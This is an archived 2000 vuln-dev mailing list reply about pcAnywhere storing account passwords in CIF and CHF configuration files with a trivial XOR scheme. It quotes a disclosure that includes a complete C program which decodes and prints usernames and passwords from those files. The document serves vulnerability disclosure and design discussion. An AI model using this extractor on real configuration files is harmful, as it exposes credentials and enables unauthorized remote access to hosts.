Vulnerability Development mailing list archives
Re: pcAnywhere weak passwords encryption in configuration files
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Thu, 4 May 2000 15:48:06 -0700
Pascal, it could be that where the passwords are being used, XOR is as strong as is possible -- if the passwords are being saved as a convenience for the client, then any way they store the password is necessarily going to be equivalent to XOR unless they store the passwords encrypted with a secret known only by the user -- and if they are being stored as a convenience, asking the user for a secret isn't going to be convenient. However, if this is on the server end of things (ie, it authenticates users) then storing the passwords in a XOR form is simply poor taste, poor design, and poor security. Perhaps Symantec could comment to either vuln-dev or bugtraq wrt how they use their passwords, especially since there seems to be many in their user community that feel passwords are being handled insecurely. * Pascal Longpre <longprep () HOTMAIL COM> [000504 15:32]:
An other pcAnywhere vulnerability... --- Discussion --- PcAnywhere uses a trivial password encryption scheme (XOR based, again!!!) to store account and password information in the configuration file. CIF files are used to store callers information and CHF files are used to record remote slaves information (username,pw and domain) in order to automate the process of logging in. A second level of protection (protect item password) has also been added on those files to protect the viewing of properties. In a network environment, the CIF files are usually stored on a centralized file server for easier management and every slave must have read access to them. Having access to CIF information can give an attacker a way to access any waiting pcAnywhere host on that network. In CHF files, even if you uncheck the "Automatically login to host..." option, the first character of every field is replaced with a space but the rest of the field's information remains in the file. --- Solution --- Symantec suggest the use of the public key encryption option. I'm told this is poorly documented. I never saw anyone use this. They also suggest using any third party encryption software but I don't see how this can fit in a network environment. --- Exploit --- The following program will extract the username, password and the Protect Item password from any CIF or CHF file. It should work fine with versions 7.5 to 9.2. // pcax - pcAnywhere password extraction program // This program extracts account information from CIF and CHF files. // // Written by Pascal Longpre (longprep () hotmail com) // Date : April 27th, 2000 // Tested on pcAnywhere version 7.5 to 9.2 #include <windows.h> #include <stdio.h> void main(int argc, char **argv) { char szBuffer[3072]; char UserName[32],Password[16],Pw2[16]; int i, BytesRead; FILE *stream; printf("pcax - pcAnywhere password extractor\n"); printf("Written by Pascal Longpre - longprep () hotmail com \n"); printf("\n"); if (!argv[1]) { printf("USAGE : pcax filename\n"); printf(" where filename is any .cif or .chf file\n"); printf("\n"); exit(1); } // Open the file in binary mode stream=fopen( argv[1], "r+b" ); BytesRead= fread(szBuffer, 1, 3072, stream); fclose(stream); // Extract CIF file account information if (strstr(argv[1],".cif")>0 || strstr(argv[1],".CIF")>0) { for (i=0; i<32; i++) UserName[i]= szBuffer[0x1cc +i-1] ^ szBuffer[0x1cc+i] ^ (0xF+i); printf("Username :%s\n",UserName); for (i=0; i<16; i++) Password[i]= szBuffer[0x24d + i - 1] ^ szBuffer[0x24d + i] ^ (0x90+i); printf("User password :%s\n",Password); } // Extract CHF files account information if (strstr(argv[1],".chf")>0 || strstr(argv[1],".CHF")>0) { for (i=0; i<32; i++) UserName[i]= szBuffer[0x82d+i-1] ^ szBuffer[0x82d+i] ^ (0x70+i); printf("Username :% s\n",UserName); for (i=1; i<15; i++) Password[i-1]= szBuffer[0x8ad+i-1] ^ szBuffer[0x8ad+i] ^ (0xf0+i); printf("Password :%s\n",Password); } // Protected item password - Same offset for both files for (i=0; i<16; i++) Pw2[i]= szBuffer[0x118 + i - 1] ^ szBuffer[0x118 + i] ^ (0x17+i); Pw2[15]='\0'; printf("Protected item password :%s\n",Pw2); } // The end Thanks to Justin Somaini (reilly () speakeasy org) for giving me the idea to investigate those config. files. Pascal Longpre (longprep () hotmail com)
-- Seth Arnold | http://www.willamette.edu/~sarnold/ Hate spam? See http://maps.vix.com/rbl/ for help 'Netscape engineers are weenies!' -- Microsoft
Current thread:
- pcAnywhere weak passwords encryption in configuration files Pascal Longpre (May 04)
- Re: pcAnywhere weak passwords encryption in configuration files Seth R Arnold (May 04)